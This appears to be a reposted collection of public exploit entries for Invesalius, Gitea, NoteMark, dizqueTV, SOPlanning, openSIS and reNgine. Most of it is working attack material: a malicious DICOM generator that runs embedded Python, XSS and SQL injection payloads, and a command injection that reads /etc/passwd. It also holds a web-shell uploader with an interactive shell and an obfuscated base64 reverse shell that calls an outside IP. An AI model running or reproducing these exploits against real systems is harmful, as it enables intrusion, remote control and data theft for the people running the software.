All posts by ISHACK AI BOT

  1. Invesalius 3.1 - Remote Code Execution (RCE)

```python
# Exploit Title: Invesalius 3.1 - Remote Code Execution (RCE)
# Discovered By: Alessio Romano (sfoffo), Riccardo Degli Esposti (partywave)
# Exploit Author: Alessio Romano (sfoffo), Riccardo Degli Esposti (partywave)
# Date: 23/08/2024
# Vendor Homepage: https://invesalius.github.io/
# Software Link: https://github.com/invesalius/invesalius3/tree/master/invesalius
# Version: 3.1.99991 to 3.1.99998
# Tested on: Windows
# CVE: CVE-2024-42845
# External References:
# https://notes.sfoffo.com/contributions/2024-contributions/cve-2024-42845
# https://github.com/partywavesec/invesalius3_vulnerabilities/tree/main/CVE-2024-42845
# https://www.partywave.site/show/research/Tic%20TAC%20-%20Beware%20of%20your%20scan
#
# Description:
# ----------------
#
# A Remote Code Execution (RCE) vulnerability exists in the DICOM file import
# procedure in Invesalius3. This vulnerability afflicts all versions from
# 3.1.99991 to 3.1.99998. The exploitation steps of this vulnerability
# involve the use of a crafted DICOM file which, once imported inside the
# victim's client application, allows an attacker to gain remote code
# execution over the victim's machine.
#
# Script:
# ----------------
#
# ###
# The script below creates a specifically crafted DICOM payload for
# CVE-2024-42845. Remote Code Execution is gained once the DICOM file is
# imported inside the victim's client application.
# ###

import pydicom
import base64
import argparse

pydicom.config.settings.reading_validation_mode = pydicom.config.IGNORE


def encode_payload(plain_payload):
    data = open(plain_payload, 'rb').read()
    return f"exec(__import__('base64').b64decode({base64.b64encode(data)})"


def prepare_dicom_payload(dicom_file_path, payload):
    try:
        dicom_data = pydicom.dcmread(dicom_file_path)
        values = dicom_data[0x0020, 0x0032].value
        mal = [str(i) for i in values]
        mal.append(encode_payload(payload))
    except pydicom.errors.InvalidDicomError:
        print("The file is not a valid DICOM file.")
    except Exception as e:
        print(f"An error occurred: {e}")
    return mal


def modify_dicom_field(dicom_file_path, malicious_tag, outfile, sign):
    try:
        dicom_dataset = pydicom.dcmread(dicom_file_path)
        if sign:
            dicom_dataset.Manufacturer = "Malicious DICOM file creator"
            dicom_dataset.InstitutionName = "Malicious DICOM file institution"
        elem = pydicom.dataelem.DataElement(0x00200032, 'CS', malicious_tag)
        dicom_dataset[0x00200032] = elem
        print(dicom_dataset)
        dicom_dataset.save_as(outfile)
    except Exception as e:
        print(f"An error occurred: {e}")


if __name__ == "__main__":
    parser = argparse.ArgumentParser(description='Read a DICOM file.')
    parser.add_argument('--dicom', required=True, help='Path to the input DICOM file')
    parser.add_argument('--outfile', required=True, help='Path to the output DICOM file')
    parser.add_argument('--payload', required=False, default=b"print('Test')",
                        help='File that contains the malicious plain python3 code')
    parser.add_argument('--signature', required=False, default=True)
    args = parser.parse_args()

    dicom_infile_path = args.dicom
    dicom_outfile_path = args.outfile
    print(args.signature)

    tmp_tag = prepare_dicom_payload(dicom_infile_path, payload=args.payload)
    if tmp_tag:
        malicious_tag = '\\'.join(tmp_tag)
        modify_dicom_field(dicom_infile_path, malicious_tag, dicom_outfile_path, sign=args.signature)
        exit(0)
    else:
        exit(1)
```
  2. Stored XSS in Gitea

# Exploit Title: Stored XSS in Gitea
# Date: 27/08/2024
# Exploit Authors: Catalin Iovita & Alexandru Postolache
# Vendor Homepage: https://github.com/go-gitea/gitea
# Version: 1.22.0
# Tested on: Linux 5.15.0-107, Go 1.23.0
# CVE: CVE-2024-6886

## Vulnerability Description

Gitea 1.22.0 is vulnerable to a Stored Cross-Site Scripting (XSS) vulnerability. This vulnerability allows an attacker to inject malicious scripts that get stored on the server and executed in the context of another user's session.

## Steps to Reproduce

1. Log in to the application.
2. Create a new repository or modify an existing repository by clicking the Settings button from the `$username/$repo_name/settings` endpoint.
3. In the Description field, input the following payload: `<a href=javascript:alert()>XSS test</a>`
4. Save the changes.
5. Upon clicking the repository description, the payload was successfully injected in the Description field. By clicking on the message, an alert box will appear, indicating the execution of the injected script.
  3. Stored XSS in NoteMark

# Exploit Title: Stored XSS in NoteMark
# Date: 07/29/2024
# Exploit Author: Alessio Romano (sfoffo)
# Vendor Homepage: https://notemark.docs.enchantedcode.co.uk/
# Version: 0.13.0 and below
# Tested on: Linux
# References:
# https://notes.sfoffo.com/contributions/2024-contributions/cve-2024-41819
# https://github.com/enchant97/note-mark/commit/a0997facb82f85bfb8c0d497606d89e7d150e182
# https://github.com/enchant97/note-mark/security/advisories/GHSA-rm48-9mqf-8jc3
# CVE: CVE-2024-41819

## Steps to Reproduce

1. Log in to the application.
2. Create a new note or enter a previously created note.
3. Access the note editor functionality from the selected note by clicking on the "Editor" tab.
4. Input the following payload: `[xss-link](javascript:alert(1))`
5. Save the changes.
6. Click on the "Rendered" tab to view the rendered markdown version of the note. Click on the previously created link to pop the injected alert.

## HTTP Request PoC

```http
PUT /api/notes/<note-uuid>/content HTTP/1.1
Host: localhost:8000
Accept: */*
Content-Type: text/plain;charset=UTF-8
Content-Length: 34
Sec-Fetch-Site: same-origin
Authorization: Bearer <TOKEN>

[xss-link](javascript:alert(1))
```
  4. dizqueTV 1.5.3 - Remote Code Execution (RCE)

# Exploit Title: dizqueTV 1.5.3 - Remote Code Execution (RCE)
# Date: 9/21/2024
# Exploit Author: Ahmed Said Saud Al-Busaidi
# Vendor Homepage: https://github.com/vexorian/dizquetv
# Version: 1.5.3
# Tested on: linux

POC:

## Vulnerability Description

dizqueTV 1.5.3 is vulnerable to unauthorized remote code execution from attackers.

## STEPS TO REPRODUCE

1. Go to http://localhost/#!/settings
2. Now go to ffmpeg settings and change the FFMPEG Executable Path to: `"; cat /etc/passwd && echo 'poc'"`
3. Click on update
4. Now visit http://localhost/#!/version or click on version and you should see the content of /etc/passwd
  5. SOPlanning 1.52.01 (Simple Online Planning Tool) - Remote Code Execution (RCE) (Authenticated)

```python
# Exploit Title: SOPlanning 1.52.01 (Simple Online Planning Tool) - Remote Code Execution (RCE) (Authenticated)
# Date: 6th October, 2024
# Exploit Author: Ardayfio Samuel Nii Aryee
# Version: 1.52.01
# Tested on: Ubuntu

import argparse
import requests
import random
import string
import urllib.parse


def command_shell(exploit_url):
    commands = input("soplaning:~$ ")
    encoded_command = urllib.parse.quote_plus(commands)
    command_res = requests.get(f"{exploit_url}?cmd={encoded_command}")
    if command_res.status_code == 200:
        print(f"{command_res.text}")
        return
    print(f"Error: An error occurred while running command: {encoded_command}")


def exploit(username, password, url):
    target_url = f"{url}/process/login.php"
    upload_url = f"{url}/process/upload.php"
    link_id = ''.join(random.choices(string.ascii_lowercase + string.digits, k=6))
    php_filename = f"{''.join(random.choices(string.ascii_lowercase + string.digits, k=3))}.php"

    login_data = {"login": username, "password": password}
    res = requests.post(target_url, data=login_data, allow_redirects=False)
    cookies = res.cookies

    multipart_form_data = {
        "linkid": link_id,
        "periodeid": 0,
        "fichiers": php_filename,
        "type": "upload"
    }
    web_shell = "<?php system($_GET['cmd']); ?>"
    files = {
        'fichier-0': (php_filename, web_shell, 'application/x-php')
    }
    upload_res = requests.post(upload_url, cookies=cookies, files=files, data=multipart_form_data)

    if upload_res.status_code == 200 and "File" in upload_res.text:
        print(f"[+] Uploaded ===> {upload_res.text}")
        print("[+] Exploit completed.")
        exploit_url = f"{url}/upload/files/{link_id}/{php_filename}"
        print(f"Access webshell here: {exploit_url}?cmd=<command>")
        if "yes" == input("Do you want an interactive shell? \n(yes/no) "):
            try:
                while True:
                    command_shell(exploit_url)
            except Exception as e:
                raise(f"Error: {e}")
    else:
        pass


def main():
    parser = argparse.ArgumentParser(prog="SOplanning RCE", \
        usage=f"python3 {__file__.split('/')[-1]} -t http://example.com:9090 -u admin -p admin")
    parser.add_argument("-t", "--target", type=str, help="Target URL (e.g., http://localhost:8080)", required=True)
    parser.add_argument("-u", "--username", type=str, help="username", required=True)
    parser.add_argument("-p", "--password", type=str, help="password", required=True)
    args = parser.parse_args()
    exploit(args.username, args.password, args.target)


main()
```
  6. openSIS 9.1 - SQLi (Authenticated)

# Exploit Title: openSIS 9.1 - SQLi (Authenticated)
# Google Dork: intext:"openSIS is a product"
# Date: 09.09.2024
# Exploit Author: Devrim Dıragumandan (d0ub1edd)
# Vendor Homepage: https://www.os4ed.com/
# Software Link: https://github.com/OS4ED/openSIS-Classic/releases/tag/V9.1
# Version: 9.1
# Tested on: Linux

A SQL injection vulnerability exists in OS4Ed Open Source Information System Community v9.1 via the "X-Forwarded-For" header parameters in POST request sent to /Ajax.php.

```
GET /Ajax.php?modname=x HTTP/1.1

---
Parameter: X-Forwarded-For #1* ((custom) HEADER)
    Type: boolean-based blind
    Title: MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
    Payload: 127.0.0.2' AND EXTRACTVALUE(5785,CASE WHEN (5785=5785) THEN 5785 ELSE 0x3A END) AND 'HVwG'='HVwG

    Type: error-based
    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
    Payload: 127.0.0.2' AND GTID_SUBSET(CONCAT(0x717a787671,(SELECT (ELT(5261=5261,1))),0x71716b6b71),5261) AND 'djze'='djze

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: 127.0.0.2' AND (SELECT 5313 FROM (SELECT(SLEEP(5)))VeyP) AND 'ZIae'='ZIae
---
```

FIX: https://github.com/OS4ED/openSIS-Classic/pull/322
  7. reNgine 2.2.0 - Command Injection (Authenticated)

# Exploit Title: reNgine 2.2.0 - Command Injection (Authenticated)
# Date: 2024-09-29
# Exploit Author: Caner Tercan
# Vendor Homepage: https://rengine.wiki/
# Software Link: https://github.com/yogeshojha/rengine
# Version: v2.2.0
# Tested on: macOS

POC:

1. Login the Rengine Platform
2. Click the Scan Engine
3. Modify any Scan Engine
4. I modified nmap_cmd parameters on yml config
5. Finally, add a target in the targets section, select the scan engine you edited and start scanning.

payload:

```
'nmap_cmd': 'echo "cHl0aG9uMyAtYyAnaW1wb3J0IHNvY2tldCxvcyxwdHk7cz1zb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULHNvY2tldC5TT0NLX1NUUkVBTSk7cy5jb25uZWN0KCgiMTAuMjQ0LjE1MC42OSIsNjE2MTIpKTtvcy5kdXAyKHMuZmlsZW5vKCksMCk7b3MuZHVwMihzLmZpbGVubygpLDEpO29zLmR1cDIocy5maWxlbm8oKSwyKTtwdHkuc3Bhd24oIi9iaW4vc2giKScg"|base64 --decode |/bin/sh #'
```